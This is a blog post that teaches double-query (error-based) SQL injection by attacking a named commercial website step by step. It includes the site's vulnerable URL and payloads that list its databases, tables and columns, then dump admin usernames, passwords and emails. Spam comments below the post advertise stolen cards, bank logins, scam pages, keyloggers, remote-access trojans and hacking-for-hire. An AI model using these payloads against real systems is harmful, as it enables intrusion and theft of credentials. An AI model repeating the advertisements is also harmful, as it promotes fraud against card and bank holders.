» » Strange Sql injection

A+ A-
hello friends,Today we are gonna see about double query based sql injection


this post is by Divakar K

  • here is the url
             http://www.advance-acoustic.com/en/produits/index/detail/id/3/sec/1

  • now find the injection point
  • here is how i got the injection point
             http://www.advance-acoustic.com/en/produits/index/detail/id/3'/sec/1
  • now the next step is to check whether we can extract database using union based command or not...but i don't get the details using the union based injection

  • now we can learn about double query based sql injection

step 1: to find the current database name


COMMAND:
http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)



  • http://www.advance-acoustic.com/en/produits/index/detail/id/3+and%28select%201%20FROM%28select%20count%28*%29,concat%28%28select%20%28select%20concat%28database%28%29%29%29%20FROM%20information_schema.tables%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29/sec/1


step 2:to find user name use user(), version-->version()


  • you can get the list of database name using this command
+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)


in this command check for "LIMIT N,1"

you have to increment the N value from 0 to no.of databases in that site


ex:i used limit 0,1 

 -->limit 1,1
there are only two databases :-p


i can't increment further



this is how you get the list of databases


step 3: now to find the list of table in the particular database


+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables WHERE table_schema=<HEX_VLAUE_OF_DB_NAME> LIMIT N,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)



<HEX_VLAUE_OF_DB_NAME>--->here our database name is advance

hex value is CHAR(97, 100, 118, 97, 110, 99, 101)


like the previous step you need to increment the N value to get the list of tables in that particular database


limit 1,1 gives admin table :-p

step 4: now the next step is to find column name for the admin table


+and(select 1 FROM(select count(*),concat((select (select (select distinct concat(cast(column_name as char)) FROM information_schema.columns WHERE table_schema=<HEX_VLAUE_OF_DB_NAME> AND table_name=<HEX_VLAUE_OF_TABLE_NAME> LIMIT N,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)




<HEX_VLAUE_OF_DB_NAME>----->CHAR(97, 100, 118, 97, 110, 99, 101)
<HEX_VLAUE_OF_TABLE_NAME>--->CHAR(97, 100, 109, 105, 110)




as like the previous step you need to increment the N value to get list of column name


limit 0,1-->username1


limit 1,1-->password1



step 5: last step is to dump the values :-p


+and+(select 1 FROM(select+count(*),concat((select+concat(0x3a,username,0x3a,password,0x3a,email,0x3a) FROM <TABLE_NAME>+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)
17:24

Post a Comment

  1. Unknown15 October 2019 at 14:19

    Hello world
    I teach hacking andriod apk virus - windows Hacking - web server hacking -
    Reseller :- Hacking Tools & Hacking services, Also Teach Hacking Methods Via teem weaver or Anydesk,
    Each Method Take minimum 1 hour to learn with vedio Tutorial And Hacking Tools ,

    How to Make Money hacking tools,

    - Spamming & Tools ,
    - Carding & Tools ,
    - Virus with control panal and Spy bot files,
    - Virus With Builder And Crypter ,
    - Scanners with Bruters ,
    - Crypters with Doc Exploits ,pdf Exploits ,TExtfile Exploits ,
    - PHP Exploits with shell and mailer
    - OTP verications Bypass with Bulletproof Scam-page and Otp control
    - Company Ceo or cfo leads Any country
    - Rat virus with builder
    - Cookies Stealers and Builder
    - keyloger and builder
    - Credit card Scam-pages
    - Bank login Scam-pages
    - debit card topup scam page
    - donation scam-page
    - dhl login and tracking scam-page
    - fedax login and tracking scam-page
    - Shipping Tools

    Place & Ground
    learners you will pay cheap $ for demo Tools & Method

    Business grounds

    Credit card Low Interest Services,

    - Credit card with Fullz Information - Minimum Investment 150$ - With 50k Credit limit And balance
    - Debit Card Topup AS per Card limit - Minimum Investment 200$ - With 8000$ balance
    - Dating scam Fresh male female Logins - Minimum Investment 80$ - Dating Login upto 30

    -----------------
    ABOUT US :
    Icq :-675452902
    Skype: rushr00t000
    email me:- hackitbackd00r@gmail.com

    ReplyDelete
  2. Hackers5 December 2019 at 06:21

    Selling good and fresh cvv fullz

    track 1 and 2 with pin

    bank login

    bank transfer

    writing cheques

    transfer to cc ...

    Sell Fresh CVV - Western Union Transfer - Bank Login - Card Dumps - Paypal - Ship

    Fresh Cards, Selling Dumps, Cvvs, Fullz

    Tickets,Hotels,Credit card topup...Paypal transfer, Mailer,Smtp,western union login,

    Book Flight Online

    SELL CVV GOOD And HACK BIG CVV GOOD Credit Card

    Fresh Cards. Selling Dumps, Cvvs, Fullz.Tickets,Hotels,Credit cards


    Sell Cvv(cc) - Wu Transfer - Card Dumps - Bank login/paypal

    And many more other hacking services

    contact me : hackerw169@gmail.com
    ICQ: 699 396 818


    - I have account paypal with good balance

    - I hope u good customers and will be long-term cooperation


    Prices Western Union Online Transfer


    -Transfer(Eu,Uk,Asia,Canada,Us,France,Germany,Italy and very

    easy to do African)

    - 200$ = 1500$ (MTCN and sender name + country sender)

    - 350$ = 4000$ (MTCN and sender name + country sender)

    - 500$ = 6000$ (MTCN and sender name + country sender)

    - 600$ = 8000$ (MTCN and sender name + country sender)

    Then i will do transfer's for you, After about 30 mins you'll have

    MTCN and sender name + country sender


    - Dumps prices

    - Tracks 1&2 US = 85$ per 1

    - Tracks 1&2 UK = 100$ per 1

    - Tracks 1&2 CA / AU = 110$ per 1

    - Tracks 1&2 EU = 120$ per 1


    Bank Logins Prices US UK CA AU EU


    - Bank Us : ( HALIFAX,BOA,CHASE,Wells Fargo...)

    . Balance 5000$ = 250$

    . Balance 8000$ = 400$

    . Balance 12000$ = 600$

    . Balance 15000$ = 800$

    . Balance 20000$ = 1000$

    - Bank UK : ( LLOYDS TSB,BARCLAYS,Standard Chartered,HSBC...)

    . Balance 5000 GBP = 300 GBP

    . Balance 12000 GBP = 600 GBP

    . Balance 16000 GBP = 700 GBP

    . Balance 20000 GBP = 1000 GBP

    . Balance 30000 GBP = 1200 GBP


    contact me : hackerw169@gmail.com
    ICQ: 699 396 818

    ReplyDelete
  3. felisha green29 January 2021 at 23:56


    If you ever want to change or up your university grades contact cybergolden hacker he'll get it done and show a proof of work done before payment. He's efficient, reliable and affordable. He can also perform all sorts of hacks including text, whatsapp, password decrypt,hack any mobile phone, Escape Bancruptcy, Delete Criminal Records and the rest

    Email: cybergoldenhacker at gmail dot com




    ReplyDelete

Subscribe to: Post Comments (Atom)
 
Top